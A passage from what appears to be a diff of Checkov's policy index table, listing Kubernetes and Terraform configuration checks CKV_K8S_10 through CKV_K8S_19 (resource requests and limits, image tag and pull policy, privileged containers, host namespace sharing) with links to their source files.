[CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2535 | CKV_K8S_10 | resource | Deployment | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2536 | CKV_K8S_10 | resource | DeploymentConfig | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2537 | CKV_K8S_10 | resource | Job | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2538 | CKV_K8S_10 | resource | Pod | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2539 | CKV_K8S_10 | resource | PodTemplate | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2540 | CKV_K8S_10 | resource | ReplicaSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2541 | CKV_K8S_10 | resource | ReplicationController | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2542 | CKV_K8S_10 | resource | StatefulSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | +| 2543 | CKV_K8S_10 | resource | kubernetes_deployment | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 2544 | CKV_K8S_10 | resource | kubernetes_deployment_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 2545 | CKV_K8S_10 | resource | kubernetes_pod | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 2546 | CKV_K8S_10 | resource | kubernetes_pod_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | +| 2547 | CKV_K8S_11 | resource | CronJob | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2548 | CKV_K8S_11 | resource | DaemonSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2549 | CKV_K8S_11 | resource | Deployment | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2550 | CKV_K8S_11 | resource | DeploymentConfig | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2551 | CKV_K8S_11 | resource | Job | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2552 | CKV_K8S_11 | resource | Pod | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2553 | CKV_K8S_11 | resource | PodTemplate | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2554 | CKV_K8S_11 | resource | ReplicaSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2555 | CKV_K8S_11 | resource | ReplicationController | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2556 | CKV_K8S_11 | resource | StatefulSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | +| 2557 | CKV_K8S_11 | resource | kubernetes_deployment | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 2558 | CKV_K8S_11 | resource | kubernetes_deployment_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 2559 | CKV_K8S_11 | resource | kubernetes_pod | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 2560 | CKV_K8S_11 | resource | kubernetes_pod_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | +| 2561 | CKV_K8S_12 | resource | CronJob | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2562 | CKV_K8S_12 | resource | DaemonSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2563 | CKV_K8S_12 | resource | Deployment | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2564 | CKV_K8S_12 | resource | DeploymentConfig | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2565 | CKV_K8S_12 | resource | Job | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2566 | CKV_K8S_12 | resource | Pod | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2567 | CKV_K8S_12 | resource | PodTemplate | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2568 | CKV_K8S_12 | resource | ReplicaSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2569 | CKV_K8S_12 | resource | ReplicationController | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2570 | CKV_K8S_12 | resource | StatefulSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | +| 2571 | CKV_K8S_12 | resource | kubernetes_deployment | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 2572 | CKV_K8S_12 | resource | kubernetes_deployment_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 2573 | CKV_K8S_12 | resource | kubernetes_pod | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 2574 | CKV_K8S_12 | resource | kubernetes_pod_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | +| 2575 | CKV_K8S_13 | resource | CronJob | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2576 | CKV_K8S_13 | resource | DaemonSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2577 | CKV_K8S_13 | resource | Deployment | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2578 | CKV_K8S_13 | resource | DeploymentConfig | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2579 | CKV_K8S_13 | resource | Job | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2580 | CKV_K8S_13 | resource | Pod | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2581 | CKV_K8S_13 | resource | PodTemplate | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2582 | CKV_K8S_13 | resource | ReplicaSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2583 | CKV_K8S_13 | resource | ReplicationController | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2584 | CKV_K8S_13 | resource | StatefulSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | +| 2585 | CKV_K8S_13 | resource | kubernetes_deployment | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 2586 | CKV_K8S_13 | resource | kubernetes_deployment_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 2587 | CKV_K8S_13 | resource | kubernetes_pod | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 2588 | CKV_K8S_13 | resource | kubernetes_pod_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | +| 2589 | CKV_K8S_14 | resource | CronJob | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2590 | CKV_K8S_14 | resource | DaemonSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2591 | CKV_K8S_14 | resource | Deployment | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2592 | CKV_K8S_14 | resource | DeploymentConfig | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2593 | CKV_K8S_14 | resource | Job | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2594 | CKV_K8S_14 | resource | Pod | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2595 | CKV_K8S_14 | resource | PodTemplate | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2596 | CKV_K8S_14 | resource | ReplicaSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2597 | CKV_K8S_14 | resource | ReplicationController | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2598 | CKV_K8S_14 | resource | StatefulSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | +| 2599 | CKV_K8S_14 | resource | kubernetes_deployment | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 2600 | CKV_K8S_14 | resource | kubernetes_deployment_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 2601 | CKV_K8S_14 | resource | kubernetes_pod | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 2602 | CKV_K8S_14 | resource | kubernetes_pod_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | +| 2603 | CKV_K8S_15 | resource | CronJob | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2604 | CKV_K8S_15 | resource | DaemonSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2605 | CKV_K8S_15 | resource | Deployment | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2606 | CKV_K8S_15 | resource | DeploymentConfig | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2607 | CKV_K8S_15 | resource | Job | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2608 | CKV_K8S_15 | resource | Pod | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2609 | CKV_K8S_15 | resource | PodTemplate | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2610 | CKV_K8S_15 | resource | ReplicaSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2611 | CKV_K8S_15 | resource | ReplicationController | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2612 | CKV_K8S_15 | resource | StatefulSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | +| 2613 | CKV_K8S_15 | resource | kubernetes_deployment | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 2614 | CKV_K8S_15 | resource | kubernetes_deployment_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 2615 | CKV_K8S_15 | resource | kubernetes_pod | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 2616 | CKV_K8S_15 | resource | kubernetes_pod_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | +| 2617 | CKV_K8S_16 | resource | CronJob | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2618 | CKV_K8S_16 | resource | DaemonSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2619 | CKV_K8S_16 | resource | Deployment | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2620 | CKV_K8S_16 | resource | DeploymentConfig | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2621 | CKV_K8S_16 | resource | Job | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2622 | CKV_K8S_16 | resource | Pod | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2623 | CKV_K8S_16 | resource | PodTemplate | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2624 | CKV_K8S_16 | resource | ReplicaSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2625 | CKV_K8S_16 | resource | ReplicationController | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2626 | CKV_K8S_16 | resource | StatefulSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | +| 2627 | CKV_K8S_16 | resource | kubernetes_deployment | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 2628 | CKV_K8S_16 | resource | kubernetes_deployment_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 2629 | CKV_K8S_16 | resource | kubernetes_pod | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 2630 | CKV_K8S_16 | resource | kubernetes_pod_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | +| 2631 | CKV_K8S_17 | resource | CronJob | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2632 | CKV_K8S_17 | resource | DaemonSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2633 | CKV_K8S_17 | resource | Deployment | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2634 | CKV_K8S_17 | resource | Job | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2635 | CKV_K8S_17 | resource | Pod | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2636 | CKV_K8S_17 | resource | ReplicaSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2637 | CKV_K8S_17 | resource | ReplicationController | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2638 | CKV_K8S_17 | resource | StatefulSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | +| 2639 | CKV_K8S_17 | resource | kubernetes_deployment | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 2640 | CKV_K8S_17 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 2641 | CKV_K8S_17 | resource | kubernetes_pod | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 2642 | CKV_K8S_17 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | +| 2643 | CKV_K8S_18 | resource | CronJob | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2644 | CKV_K8S_18 | resource | DaemonSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2645 | CKV_K8S_18 | resource | Deployment | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2646 | CKV_K8S_18 | resource | Job | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2647 | CKV_K8S_18 | resource | Pod | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2648 | CKV_K8S_18 | resource | ReplicaSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2649 | CKV_K8S_18 | resource | ReplicationController | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2650 | CKV_K8S_18 | resource | StatefulSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | +| 2651 | CKV_K8S_18 | resource | kubernetes_deployment | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 2652 | CKV_K8S_18 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 2653 | CKV_K8S_18 | resource | kubernetes_pod | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 2654 | CKV_K8S_18 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | +| 2655 | CKV_K8S_19 | resource | CronJob | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2656 | CKV_K8S_19 | resource | DaemonSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2657 | CKV_K8S_19 | resource | Deployment | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2658 | CKV_K8S_19 | resource | Job | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2659 | CKV_K8S_19 | resource | Pod | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2660 | CKV_K8S_19 | resource | ReplicaSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2661 | CKV_K8S_19 | resource | ReplicationController | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2662 | CKV_K8S_19 | resource | StatefulSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | +| 2663 | CKV_K8S_19 | resource | kubernetes_deployment | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 2664 | CKV_K8S_19 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | +| 2665 | CKV_K8S_19 | resource | kubernetes_pod | Do not admit containers wishing to share the host network namespace | 